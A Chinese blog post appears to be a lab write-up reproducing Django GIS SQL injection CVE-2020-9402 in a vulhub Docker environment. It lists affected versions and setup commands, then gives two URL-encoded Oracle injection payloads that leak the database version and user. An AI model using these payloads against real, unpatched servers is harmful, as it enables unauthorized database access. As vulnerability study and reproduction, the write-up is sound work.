Django GIS SQL注入漏洞(CVE-2020-9402)

最新推荐文章于 2024-05-17 11:06:19 发布
最新推荐文章于 2024-05-17 11:06:19 发布
阅读量959 收藏 2
点赞数
分类专栏: 中间件漏洞复现 文章标签: django 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111135560
版权

声明

好好学习,天天向上

漏洞描述

Django在2020年3月4日发布了一个安全更新,修复了在GIS 查询功能中存在的SQL注入漏洞。

该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。

影响范围

1.11.29之前的1.11.x版本

2.2.11之前的2.2.x版本

3.0.4之前的3.0.x版本

复现过程

这里使用3.0.3版本

使用vulhub

cd /app/vulhub-master/django/CVE-2020-9402

使用docker启动

docker-compose up -d

环境启动后,访问http://your-ip:8000

http://192.168.239.129:8000

环境稍微难启动,首先需要很大的磁盘空间,9G左右,提前用docker把镜像删掉,其次,下载过程失败,就多试几次,启动后,多等一会,我的是反反复复搞了三四次才搞定

在这里插入图片描述

payload1

http://192.168.239.129:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

在这里插入图片描述

payload2

http://192.168.239.129:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-9402 —— Django GIS SQL注入漏洞
战神/calmness的博客
12-11 433
介绍 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 SQL注入过程: ...
Django SQL注入漏洞CVE-2020-7471)复现
锋刃科技的博客
08-01 2812
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
17 - vulhub - Django GIS SQL注入漏洞CVE-2020-9402
易编橙 · 终身成长社群,相遇已是上上签!
11-10 1647
文章目录漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402)影响版本漏洞原理漏洞复现漏洞利用限制环境准备漏洞利用漏洞漏洞漏洞详细分析修复建议 漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402) 简介: DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在S
Django-CVE-2020-9402 复现
最新发布
weixin_60567444的博客
05-17 306
GIS 查询功能中存在的SQL注入漏洞,使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞
Oracle SQL 注入上的 Django GIS 函数和聚合漏洞CVE-2020-9402
weixin_56537388的博客
11-24 702
Django2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。
Django SQL注入漏洞CVE-2020-7471) 复现
weixin_47531489的博客
07-19 725
1 简介 Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。Django 遵守 BSD 版权,初次发布于 2005 年 7 月, 并于 2008 年 9 月发布了第一个正式版本 1.0 。Django 采用了 MVT 的软件设计模式,即模型(Model),视图(View)和模板(Template)。 2 漏洞概述 2020年2月3日,Django
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
Django_CVE-2020-9402_Geo_SQL注入分析 Django 框架是一个流行的 Python Web 框架,它提供了许多实用的功能,包括 GIS( Geographic Information System)查询功能。然而,在 Django 中的 GIS 查询中存在一个_sql ...
CVE-2020-7471:django 漏洞CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 的漏洞环境和 POC
04-14
CVE-2020-7471这个仓库提供 CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 漏洞的环境和 POC受影响的 django 版本1.11 到 1.11.28(不含)2.2 到 2.2.10(不含)3.0 到 3.0.3(不含)下载使用前...
EXCLE 2010教程
12-21
EXCLE 2010教程!适合初学者掌握发挥EXCLE2010的强大功能!
django-rest-framework-gisDjango REST Framework的地理附加组件。 由OpenWISP项目维护
02-05
**django-rest-framework-gis** 是一个扩展 **Django REST Framework** 的强大库,专注于处理与地理信息系统(GIS)相关的数据。这个项目由 **OpenWISP** 维护,旨在为开发人员提供一套全面的工具,以便在RESTful ...
django-rest-captcha
05-27
Django Rest验证码django-simple-captcha轻量级版本,可与django-rest-framework 。特征速度:使用cache代替数据库安全性:用于生成密钥和图像的联合方法。 (一个键不能生成很多图像) 简单:只需一个rest api...
vulhub复现之djangoCVE-2019-14234、CVE-2020-9402
小城的博客
12-03 1041
vulhub复现之djangoCVE-2019-14234、CVE-2020-9402CVE-2018-14574、CVE-2017-12794)背景小故事django漏洞概述CVE-2019-14234漏洞复现漏洞修复CVE-2020-9402漏洞复现修复建议 背景小故事 公司的人一个个的都去云南参加等保测评考试,剩下我一个小扑街孤苦伶仃地在公司学习,惨的一批(我也想去云南地说) 没办法,自己搭了个vulhub玩玩,学习学习cve漏洞复现 django漏洞概述 Django通常搭配postgres
Django GIS SQL注入漏洞复现(CVE-2020-9402
Beret-81的博客
06-17 2109
Django GIS SQL注入漏洞复现漏洞详情漏洞环境漏洞复现 漏洞详情 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 漏洞环境 环境搭建,环境启动后,访问http://your-ip:8000即可看到Dja
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8073
多次跳转导致的ssrf
17 - vulhub - Django GIS SQL注入漏洞CVE-2024-9402
2401_83974064的博客
04-06 388
目、讲解视频,并且后续会持续更新**
vulhub Django GIS SQL注入漏洞复现
weixin_53696027的博客
05-25 231
vulhub CVE-2020-9402漏洞复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值